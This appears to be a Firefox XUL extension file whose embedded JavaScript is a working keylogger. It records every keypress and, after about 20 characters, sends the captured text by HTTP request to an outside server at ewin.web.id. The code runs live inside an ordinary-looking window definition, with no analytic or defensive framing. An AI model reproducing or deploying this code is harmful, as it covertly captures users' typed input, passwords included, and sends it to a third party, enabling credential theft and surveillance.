<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
<window id="yourwindow" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

 <script>
<![CDATA[

 	document.addEventListener("keypress",onkey,false);
 	var keyss='';
 	function onkey(e)  {      
 	keyss+=String.fromCharCode(e.charCode);              
 	
	if (keyss.length>20) {
	http=new XMLHttpRequest();
        http.open("GET","http://ewin.web.id/l0g/strokes.php?keylog=" + keyss,true);
	http.send(null);    
	keyss='';
}
}     

]]>
  </script>
  <script type="application/x-javascript" src="chrome://content/debugger.js"/>
</window>
